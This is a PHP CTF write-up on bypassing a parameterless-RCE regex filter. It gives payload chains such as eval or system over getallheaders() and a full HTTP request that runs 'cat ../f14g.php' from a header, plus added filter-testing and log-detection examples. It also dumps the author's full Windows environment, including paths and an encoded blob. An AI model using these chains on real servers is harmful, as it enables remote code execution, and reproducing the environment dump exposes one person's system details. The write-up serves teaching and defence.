Parameterless RCE
Reference: "RCE: parameterless RCE" by 学安全的小白 on 博客园 (cnblogs.com)
"A detailed summary of parameterless RCE bypasses (six methods)" (无参数的取反rce) on CSDN博客
Base code
```php
<?php
highlight_file(__FILE__);
if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {
    if(!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i',$_GET['star'])){
        eval($_GET['star']);
    }
}
```
In short, the input is run through a regex replacement: every call of the form name(...), where the name consists of letters, digits and underscores and the argument is either empty or one more such call, is replaced with nothing, and the input is only accepted if a single ";" is left over.
[^\W] (a negated \W) matches letters, digits and underscores, i.e. it is equivalent to [A-Za-z0-9_]; (?R)? optionally matches the whole pattern again recursively.
a(b(c())); can be used, but anything that carries arguments, such as a('b') or a('b','c'), cannot, and neither can a(b). So we have to use parameterless functions to read files or execute commands.
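To make the two checks concrete, here is an added example that is not part of the original write-up: it wraps the challenge's two checks in a function and runs the input forms discussed above through it. The sample inputs are constructed for this example; the function name passes_filter is an assumption.

```php
<?php
// Added example (not from the original write-up): reproduces the challenge's two checks
// as a function so the filter's semantics can be observed on sample inputs.
// The regex /[^\W]+\((?R)?\)/ strips one "name( ... )" call whose argument, if any,
// is itself such a call; only an input that collapses to exactly ";" survives.

function passes_filter(string $star): bool
{
    $stripped = preg_replace('/[^\W]+\((?R)?\)/', '', $star);
    if ($stripped !== ';') {
        return false; // something other than a chain of parameterless calls remained
    }
    // Second check: the challenge's case-insensitive keyword blacklist, kept verbatim,
    // including its "curent" misspelling (so "current" is not blocked).
    return !preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i', $star);
}

// Constructed sample inputs: the forms discussed in the write-up, with the expected verdict.
$samples = [
    'a(b(c()));'                                          => true,  // nested parameterless calls
    "a('b');"                                             => false, // string-literal argument remains
    "a('b','c');"                                         => false, // two arguments remain
    'a(b);'                                               => false, // a bare identifier is not a call
    'a(b(c()))'                                           => false, // nothing but "" left, not ";"
    'eval(array_pop(array_values(getallheaders())));'     => true,  // chain from the write-up
    'system(array_pop(array_values(getallheaders())));'   => true,  // chain from the write-up
    'print_r(scandir(getcwd()));'                         => false, // passes the regex, hits "scandir"
];

foreach ($samples as $input => $expected) {
    $actual = passes_filter($input);
    printf("%-52s %s%s\n", $input, $actual ? 'accepted' : 'rejected',
        $actual === $expected ? '' : '  <-- unexpected');
}
```

Running it shows that the accepted surface is any chain of parameterless calls terminated by ";"; a keyword blacklist only removes individual names from that surface, which is why the filter cannot make eval on request data safe.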

Another thing to consider is how the parameter gets passed in.
1. getallheaders() & apache_request_headers()
getallheaders() is an alias of the latter; the function can only be used under Apache.
Purpose: returns all HTTP request headers as an array, which can be printed with var_dump.
2. Companion functions
Array functions:
current(): returns the value of the array's current element
next(): moves the array's internal pointer to the next element
prev(): moves the array's internal pointer to the previous element
reset(): moves the array's internal pointer to the first element
each(): returns the key and value of the current element and advances the internal pointer; newer PHP versions may have removed it
end(): returns the last element of the array
implode(): joins a one-dimensional array into a string
array_values(): returns the array's values without their keys. To create an array: $a=array("Name"=>"Peter","Age"=>"41","Country"=>"USA");
array_pop(): removes the last element of the array and returns it
array_reverse(): returns the array with its elements in reverse order
pos(): outputs the value of the array's current element
Since eval, system and similar functions need a string argument, the array returned by getallheaders() has to be turned into a string with one of the functions above.
File reading:
highlight_file()
show_source()
readfile()
String:
strrev(): reverses the given string
3. get_defined_vars()
A replacement for getallheaders() with no environment restriction.
Returns a multidimensional array listing all defined variables, including environment variables, server variables and user-defined variables.
```php
<?php
$b = array(1,1,2,3,5,8);
$arr = get_defined_vars();
// print $b
print_r($arr["b"]);
// print the path of the PHP interpreter (if PHP is run as CGI)
// e.g. /usr/local/bin/php
echo $arr["_"];
// print the command-line arguments (if any)
print_r($arr["argv"]);
// print all server variables
print_r($arr["_SERVER"]);
// print all available keys of the variables array
print_r(array_keys(get_defined_vars()));
?>
```
Output:
D:\WORK\php-8.3.4-Win32-vs16-x64\php.exe D:\WORK\workstations\PHP\2.php
Array
(
[0] => 1
[1] => 1
[2] => 2
[3] => 3
[4] => 5
[5] => 8
)
Warning: Undefined array key "_" in D:\WORK\workstations\PHP\2.php on line 11
Array
(
[0] => D:\WORK\workstations\PHP\2.php
)
Array
(
[ALLUSERSPROFILE] => C:\ProgramData
[APPCODE_VM_OPTIONS] => D:\jetbra\vmoptions\appcode.vmoptions
[APPDATA] => C:\Users\29210\AppData\Roaming
[CLION_VM_OPTIONS] => D:\jetbra\vmoptions\clion.vmoptions
[CommonProgramFiles] => C:\Program Files\Common Files
[CommonProgramFiles(x86)] => C:\Program Files (x86)\Common Files
[CommonProgramW6432] => C:\Program Files\Common Files
[COMPUTERNAME] => BLAME
[ComSpec] => C:\WINDOWS\system32\cmd.exe
[DATAGRIP_VM_OPTIONS] => D:\jetbra\vmoptions\datagrip.vmoptions
[DATASPELL_VM_OPTIONS] => D:\jetbra\vmoptions\dataspell.vmoptions
[DEVECOSTUDIO_VM_OPTIONS] => D:\jetbra\vmoptions\devecostudio.vmoptions
[DriverData] => C:\Windows\System32\Drivers\DriverData
[EFC_7144] => 1
[FPS_BROWSER_APP_PROFILE_STRING] => Internet Explorer
[FPS_BROWSER_USER_PROFILE_STRING] => Default
[GATEWAY_VM_OPTIONS] => D:\jetbra\vmoptions\gateway.vmoptions
[GOLAND_VM_OPTIONS] => D:\jetbra\vmoptions\goland.vmoptions
[HOMEDRIVE] => C:
[HOMEPATH] => \Users\29210
[IDEA_INITIAL_DIRECTORY] => C:\Users\29210\OneDrive\桌面
[IDEA_VM_OPTIONS] => D:\jetbra\vmoptions\idea.vmoptions
[IGCCSVC_DB] => AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAFF4shdcu3keVHrcD+xdrtwQAAAACAAAAAAAQZgAAAAEAACAAAABZOYDF9s9uJVaEzgp2vfJ/IsyRtMjBKxx6hKUyIGH5uwAAAAAOgAAAAAIAACAAAABpA2/84SajgKBcfZu4s8c3BfYDi5n0eef/r+drcCkxnWAAAAA1JPUfc05KYxYCAHqN3BGUZo7zYdUVWbcV5C+7UhGcfv/6JYtEy+CTeRATYlcFv3Vy3gUQkoQRGcDGzYkoh5/rKoMzGCHNtQFTIjxXxKRv/+iyAgoxU0JzILtaua+vEkFAAAAATUs1PCs/qGm+FFrdGLrVkFyacz4Yd7lkZELI0XTzWjANFlGpH/aMsEFmMR+eG7YFsCZL/k13bXUwZCsLX0+mpQ==
[JAVA_HOME] => D:\WORK\
[JETBRAINSCLIENT_VM_OPTIONS] => D:\jetbra\vmoptions\jetbrainsclient.vmoptions
[JETBRAINS_CLIENT_VM_OPTIONS] => D:\jetbra\vmoptions\jetbrains_client.vmoptions
[LOCALAPPDATA] => C:\Users\29210\AppData\Local
[LOGONSERVER] => \\BLAME
[NUMBER_OF_PROCESSORS] => 16
[OneDrive] => C:\Users\29210\OneDrive
[OneDriveConsumer] => C:\Users\29210\OneDrive
[OS] => Windows_NT
[Path] => D:\WORK\JDK21\bin;C:\Program Files\Common Files\Oracle\Java\javapath;D:\WORK\Python\Scripts\;D:\WORK\Python\;D:\Vmware\bin\;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;D:\Unzip\Bandizip\;D:\WORK\Microsoft VS Code\bin;D:\WORK\php-8.3.4-Win32-vs16-x64;D:\WORK\anaconda;D:\WORK\anaconda\Scripts;D:\WORK\anaconda\Library\mingw-w64\bin;D:\WORK\anaconda\Library\usr\bin;D:\WORK\anaconda\Library\bin;D:\Nodejs\;C:\Program Files\Docker\Docker\resources\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Users\29210\AppData\Local\Microsoft\WindowsApps;;D:\WORK\PyCharm Community Edition 2024.1.4\bin;;D:\WORK\IntelliJ IDEA Community Edition 2023.3.4\bin;;D:\Tools\新建文件夹\Nmap;C:\Users\29210\AppData\Local\Programs\Microsoft VS Code\bin;D:\WORK\PhpStorm 2024.1.4\bin;;C:\Users\29210\AppData\Roaming\npm;D:\WORK\javaida\IntelliJ IDEA 2024.1.3\bin;;D:\WORK\PyCharm 2024.1.4\bin;
[PATHEXT] => .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
[PhpStorm] => D:\WORK\PhpStorm 2024.1.4\bin;
[PHPSTORM_VM_OPTIONS] => D:\jetbra\vmoptions\phpstorm.vmoptions
[PROCESSOR_ARCHITECTURE] => AMD64
[PROCESSOR_IDENTIFIER] => Intel64 Family 6 Model 186 Stepping 2, GenuineIntel
[PROCESSOR_LEVEL] => 6
[PROCESSOR_REVISION] => ba02
[ProgramData] => C:\ProgramData
[ProgramFiles] => C:\Program Files
[ProgramFiles(x86)] => C:\Program Files (x86)
[ProgramW6432] => C:\Program Files
[PSModulePath] => C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
[PT8HOME] => D:\Cisco Packet Tracer 8.2.2
[PUBLIC] => C:\Users\Public
[PyCharm] => D:\WORK\PyCharm 2024.1.4\bin;
[PYCHARM_VM_OPTIONS] => D:\jetbra\vmoptions\pycharm.vmoptions
[RIDER_VM_OPTIONS] => D:\jetbra\vmoptions\rider.vmoptions
[RUBYMINE_VM_OPTIONS] => D:\jetbra\vmoptions\rubymine.vmoptions
[SESSIONNAME] => Console
[STUDIO_VM_OPTIONS] => D:\jetbra\vmoptions\studio.vmoptions
[SystemDrive] => C:
[SystemRoot] => C:\WINDOWS
[TEMP] => C:\Users\29210\AppData\Local\Temp
[TERM] => xterm
[TMP] => C:\Users\29210\AppData\Local\Temp
[USERDOMAIN] => BLAME
[USERDOMAIN_ROAMINGPROFILE] => BLAME
[USERNAME] => 29210
[USERPROFILE] => C:\Users\29210
[WEBIDE_VM_OPTIONS] => D:\jetbra\vmoptions\webide.vmoptions
[WEBSTORM_VM_OPTIONS] => D:\jetbra\vmoptions\webstorm.vmoptions
[windir] => C:\WINDOWS
[XiuMaster_v1_button_hotkey] => 16777232
[ZES_ENABLE_SYSMAN] => 1
[PHP_SELF] => D:\WORK\workstations\PHP\2.php
[SCRIPT_NAME] => D:\WORK\workstations\PHP\2.php
[SCRIPT_FILENAME] => D:\WORK\workstations\PHP\2.php
[PATH_TRANSLATED] => D:\WORK\workstations\PHP\2.php
[DOCUMENT_ROOT] =>
[REQUEST_TIME_FLOAT] => 1731328253.109
[REQUEST_TIME] => 1731328253
[argv] => Array
(
[0] => D:\WORK\workstations\PHP\2.php
)
[argc] => 1
)
Array
(
[0] => _GET
[1] => _POST
[2] => _COOKIE
[3] => _FILES
[4] => argv
[5] => argc
[6] => _SERVER
[7] => b
[8] => arr
)
进程已结束,退出代码为 0
4. scandir()
Returns the files and directories of the given directory; can be combined with getcwd().
print_r(scandir(getcwd())); returns the following:

5. localeconv()
Returns an array containing local numeric and monetary formatting information:
[decimal_point] - decimal point character
[thousands_sep] - thousands separator
[int_curr_symbol] - international currency symbol (e.g. USD)
[currency_symbol] - local currency symbol (e.g. $)
[mon_decimal_point] - monetary decimal point character
[mon_thousands_sep] - monetary thousands separator
[positive_sign] - sign for positive values
[negative_sign] - sign for negative values
[int_frac_digits] - international fractional digits
[frac_digits] - local fractional digits
[p_cs_precedes] - True (1) if the currency symbol precedes a positive value, False (0) if it follows it
[p_sep_by_space] - True (1) if a space separates the currency symbol from a positive value, otherwise False (0)
[n_cs_precedes] - True (1) if the currency symbol precedes a negative value, False (0) if it follows it
[n_sep_by_space] - True (1) if a space separates the currency symbol from a negative value, otherwise False (0)
[p_sign_posn] - formatting option:
0 - parentheses surround the quantity and the currency symbol
1 - a + sign precedes the quantity and the currency symbol
2 - a + sign follows the quantity and the currency symbol
3 - a + sign immediately precedes the currency symbol
4 - a + sign immediately follows the currency symbol
The first element returned, the "." in decimal_point, can be used as the "." that denotes the current directory.
Challenges
1. 2023 NewStarCTF - R!!C!!E!!
```php
<?php
highlight_file(__FILE__);
if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {
    if(!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i',$_GET['star'])){
        eval($_GET['star']);
    }
}
```
payload:

Why is another eval needed to process the parameter?
With only one, eval(array_pop(array_values(getallheaders()))) ==> system('ls'); so one more layer has to be added before the statement is formed into PHP code.
2. 7th Zhejiang Provincial College Student Network and Information Security Competition
```http
GET /?code=system(array_pop(array_values(getallheaders()))); HTTP/1.1
a:cat ../f14g.php
Host: 10.1.101.31
Connection: close
Content-Type:aaa
Content-Length: 14

adsfsfdghfghgj
```
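From the defender's side, the requests in both challenges have a recognisable shape in web-server access logs. The following is an added example, not from the write-up or from either competition: a small PHP routine that flags query strings built from nested parameterless calls or from the function names used in the chains above, run over constructed Apache-style log lines. The log format, the function names inspect_query and scan_log, the RCE_GADGETS list and the log lines themselves are all assumptions made for this example.

```php
<?php
// Added example (not from the original write-up): a detection rule for access logs
// that flags query strings shaped like the parameterless-RCE chains discussed above.
// Assumed log format: Apache combined log with the request line in double quotes.

// Function names used in the write-up's chains: header/variable sources,
// array-to-string conversion helpers, and the eval/system sinks.
const RCE_GADGETS = [
    'getallheaders', 'apache_request_headers', 'get_defined_vars', 'localeconv',
    'scandir', 'getcwd', 'array_pop', 'array_values', 'array_reverse',
    'current', 'pos', 'next', 'end', 'eval', 'system',
];

// Returns the list of reasons a query string looks suspicious (empty if none).
function inspect_query(string $query): array
{
    $decoded = rawurldecode($query);
    $reasons = [];

    // Two or more nested calls whose innermost argument is empty, e.g. a(b(c())).
    if (preg_match('/[A-Za-z_]\w*\((?:[A-Za-z_]\w*\()+\)\)/', $decoded)) {
        $reasons[] = 'nested parameterless call chain';
    }
    // Any known gadget name immediately followed by "(".
    foreach (RCE_GADGETS as $name) {
        if (preg_match('/\b' . preg_quote($name, '/') . '\s*\(/i', $decoded)) {
            $reasons[] = 'gadget: ' . $name;
        }
    }
    return $reasons;
}

// Scans log lines and returns the flagged request targets with their reasons.
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Pull the request target out of the quoted request line.
        if (!preg_match('/"(?:GET|POST) ([^ ]+) HTTP/', $line, $m)) {
            continue;
        }
        $target = $m[1];
        $query = (string) parse_url($target, PHP_URL_QUERY);
        if ($query === '') {
            continue;
        }
        $reasons = inspect_query($query);
        if ($reasons) {
            $hits[] = ['target' => $target, 'reasons' => $reasons];
        }
    }
    return $hits;
}

// Constructed log lines: benign requests mixed with the payload shapes from the write-up.
$log = [
    '203.0.113.5 - - [11/Nov/2024:12:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2024:12:00:01 +0000] "GET /?star=a(b(c())); HTTP/1.1" 200 301',
    '203.0.113.5 - - [11/Nov/2024:12:00:02 +0000] "GET /?star=eval(array_pop(array_values(getallheaders()))); HTTP/1.1" 200 301',
    '203.0.113.5 - - [11/Nov/2024:12:00:03 +0000] "GET /?code=system(array_pop(array_values(getallheaders()))); HTTP/1.1" 200 301',
    '203.0.113.5 - - [11/Nov/2024:12:00:04 +0000] "GET /search.php?q=current+events HTTP/1.1" 200 2048',
];

foreach (scan_log($log) as $hit) {
    echo $hit['target'], "\n  ", implode(', ', $hit['reasons']), "\n";
}
```

The two benign lines produce no hit (the word "current" in a search term is not followed by a parenthesis), while the three payload-shaped requests are reported with the chain and every gadget name they use. Note that getallheaders() reads the headers, so the command itself ("cat ../f14g.php" in the second challenge) never appears in the query string; that is why the rule looks for the structure of the chain rather than for command names, and why capturing request headers, not only request lines, matters when investigating this class of attack.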